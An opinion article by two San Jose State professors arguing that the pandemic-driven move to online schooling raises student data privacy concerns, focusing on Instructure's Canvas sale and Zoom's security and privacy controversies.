Most of America’s public schools have closed during the global coronavirus pandemic and U.S. districts are engaged in an unprecedented shift to online education — at least until the crisis is over.

Along with obvious concerns about this vast, rapid shift to digital education — such as whether students have technology and Internet access, and what materials can quickly be put on line — there is another that gets less attention. It’s student data privacy.

In 2018, the FBI issued a warning to the public about cyberthreat concerns related to K-12 students. It said that the growth of education technologies in education, along with widespread collection of student data, could have serious privacy and safety implications if compromised or exploited by criminals.

The FBI said the types of data that can be collected on students include personally identifiable information; biometric data; academic progress; behavioral, disciplinary and medical information; Web browsing history; students’ geolocation; IP addresses used by students; and classroom activities.

This post looks at some of the current issues around student data privacy as millions of students are now trying to learn online at home. This was written by Roxana Marachi, an associate professor of education at San Jose State University, and Lawrence Quill, a professor of political science at San Jose State University. The views and opinions expressed here are those of Marachi and Quill and do not necessarily reflect the official policy or position of their employer.

(This is an update to an earlier version, adding new information.)

By Roxana Marachi and Lawrence Quill

Hundreds of universities and colleges are transitioning from face-to-face courses to “online” and “distributed” modes of instruction as a result of the coronavirus pandemic, which has shut down American schools coast to coast.

The architecture is already in place to respond to the new learning environment created by the pandemic. Platforms such as the Canvas Learning Management System (LMS), which operates across the country in thousands of colleges, universities and K-12 schools, already have access to data from millions of faculty and students and will gain access to many more.

Zoom Video Communications, a California-based remote conferencing-services company, is also likely to find experienced users turning to its videoconferencing system, as well as additional new users who will employ the software for the first time.

Adoption of these technologies comes at a pivotal moment for educational institutions. As schools move to these online spaces, it’s important that we not lose sight of ongoing controversies associated with these platforms.

Instructional technologists and educators recently penned a letter of protest in December of 2019 to leadership at Instructure — a Utah-based educational-technology company that is Canvas’s parent company — over concerns that the pending sale of the company for an estimated $2 billion to Thoma Bravo (a private equity firm) would compromise student data.

The letter cites a speech at an investor’s conference in March 2019 by then CEO of Instructure, Dan Goldsmith, who “lauded the sheer amount of student data the company possesses: ‘We have the most comprehensive database on the educational experience in the globe. So given that information that we have, no one else has those data assets at their fingertips to be able to develop those algorithms and predictive models.’

The authors of the letter requested legally binding statements from the company specifying what would be done with the data, what protections would be enacted, who would have access under new ownership, and how students would be able to opt out of data collection and retention.

As a response, Instructure invited the lead author, Cristina Colquhoun, onto Instructure’s Privacy Council and indicated they would create a Privacy Advisory Board to discuss questions related to the use of data. Despite public assurances denying the sale of data, issues raised within the letter remain unresolved and without the legally binding agreements that had been requested. We reached out to Colquhoun, who conveyed that “they are working with us to come up with resolutions and it’s a long process, but resolutions have not yet been enacted. Hence the petition is still open until legally binding statements are incorporated and solutions enacted.”

Currently, Goldsmith no longer leads Instructure, and plans for the company are still in flux, but the various kinds of algorithmic and predictive models referred to in his March 2019 speech are commonly cited in data-driven plans across the larger education technology sector. Funding streams for many education tech companies rely on the ability to monetize student behavioral data and to extend the surveillance of students’ learning experiences before, during, and after college, and into employee placement and corporate training programs.

Many recent educational initiatives, including piecemeal digital badges, “inter-operable learning records” and skills registries, involve attempts to create digital trails that will follow a student over their entire educational path, ostensibly making it easier for employers to find hires with the specific skills they need. At some point in the not-too-distant future, we can expect that long-term profiles of students from pre-K and grade school through college — including grade point averages, aptitude assessments, and behavioral data from interactions with online platforms — will be available for college admission committees and employers to scrutinize.

Instructure has said publicly in response to the request for a binding statement that it will not sell data: “Instructure has not and will not sell user data. Our perspective and commitment haven’t changed. We will always comply with privacy laws. We will be transparent and communicative about our privacy practices.” Holden Spaht, managing director of Thoma Bravo (Instructure’s potential acquirer), publicly stated: “We commit to being transparent in our data usage, protecting user privacy, and leading by example. We do not — and we will not —sell student data. And we will never share user data with other companies in the Thoma Bravo portfolio.”

While both companies state these public commitments for transparency and communication, its leaders have yet to initiate direct communication to the more than 30 million users of the platform about its pending sale to a private equity firm, updates regarding privacy implications of the sale, or user options to manage their data.

Further, even if Instructure were to fulfill its non-legally binding promise to keep data safe from “sale,” it has allowed and still allows provisions for data sharing with third-party affiliates, and stores its data on Amazon Web Services, among the largest of big data companies that also hosts student and instructor data from hundreds of other ed tech firms.

Instructure says its employees design every feature that uses data “with the student, educator, or administrator in mind.”

Yet programs that may sound student-centric often do not fully account for issues of access, opportunity, or equity. There are structural, hidden costs and stark inequities baked in to outcomes that would result from the long-term datafication of students’ lives.

For many ed tech companies, a child’s early challenges stored on such digital trails may not be deleted or may be unfairly and inappropriately entered into flawed algorithmic predictions that would lead to later limited opportunities. Privacy International explains discriminatory consequences of data exploitation, where data collected about an individual at one time point can lead to closed opportunities later on.

Researchers from the Data Justice Lab at Cardiff University have documented a host of data harms resulting from big data analytics that include, among others, targeting based on vulnerability, misuse of personal information, discrimination, data breaches, social harm and political manipulation.

As for Zoom, the videoconferencing application has quickly established itself as the education solution for synchronous meetings, and in March was holding the position as the top downloaded app in the Apple Store.

It has managed to achieve this reach in part through a process of subsidization, offering the technology service free to gain market share. Not surprisingly, such instant access has also allowed for widespread reach and a vast capacity for data extraction.

In 2019, the Electronic Privacy Information Center, a Washington D.C.-based independent nonprofit research center, filed a complaint [ with the Federal Trade Commission concerning security problems with Zoom’s video conferencing service. The complaint said Zoom had engaged in “unfair and deceptive business practices” in the design of the platform that permitted Zoom to “bypass browser security settings and remotely enable a user’s web camera without the knowledge or consent of the user.

In a recent response to a query about this issue, Zoom stated that EPIC’s 2019 complaint was regarding a bug in the Zoom platform that could potentially enable a bad actor to force a Mac user to join a Zoom room with video enabled. EPIC raised this issue in July of 2019 and Zoom promptly addressed it, fully resolving the matter."

The promptness of the response could be debated, however, as the FTC complaint indicated that when Zoom was informed of the vulnerabilities, “it did not act until the risks were made public, several months after the matter was brought to the company’s attention.”

Currently, a number of controversies with the platform remain in the public sphere, including “attention tracking” of attendees, privacy issues relating to potential data sales, and default settings that allow for screen sharing to be interrupted and controlled by individuals on a call other than the conference coordinator. The New York Times and Forbes have reported on this most recent issue as Zoombombing and it has appropriately now seen a rise in posts to its corresponding hashtag.

As author and scholar Shoshana Zuboff notes in her work on surveillance capitalism, the suppression of privacy is at the heart of this business model with a built-in tendency to test the limits of what is socially and legally acceptable in terms of data collection.

E-learning platforms pursue an imperative to collect more and more data. Every action a user performs may be recorded and scanned for information, which can then be used to reconfigure algorithms and optimize processes.

It is precisely this model that is being utilized by Facebook’s Oculus VR system, also making inroads into education. The VR software is able to collect a wide range of data on its users’ emotional and physiological experiences within virtual spaces; data that can then be sold on to advertisers or in human capital performance markets.

What we’re seeing can be described as the “apology model of data extraction.” First, companies collect as much data as possible. Then, if there is an outcry, they respond with an apology and offer to consult with users by walking back the most egregious policies.

Online technologies undoubtedly have the capacity to perform useful services. But an easy-to-use interface shouldn’t give companies free rein to take as much data as they wish, especially when users are not allowed options to opt out. Within education, we need stronger systemic guardrails in place to protect against exploitative practices of tech companies vying for lucrative contracts.

We also need to recognize that current emerging technologies, including Blockchain identity systems and ledger-based badging programs, are part of much broader trends designed to both co-opt and upend public institutions that have been struggling to maintain standards with decreased funding and increasing demands.

With data as the new oil, there is every reason to suspect that the world of education will not return to “business as usual” after the current coronavirus pandemic passes, precisely because education has been identified as an “industry” ripe for disruption.

We are experiencing a watershed moment with these shifts. At no other time in history have we seen such an epic, massive move from in-person learning experiences to online instruction.

The idea that nothing can be done to resist the kinds of technological disruption we are now witnessing in education must be resisted. It betrays a misunderstanding about how technologies develop in the first place, ignores power dynamics in the shaping of education policies, and too readily sacrifices the social commitments that have held our society together; values, moreover, that are now being tested as a result of the coronavirus pandemic.

Inevitability arguments reject the past by spuriously claiming to possess the requisite knowledge necessary to reform society. We would do well to remember this as we shift to using technologies that challenge some of the core values of our liberal democracy.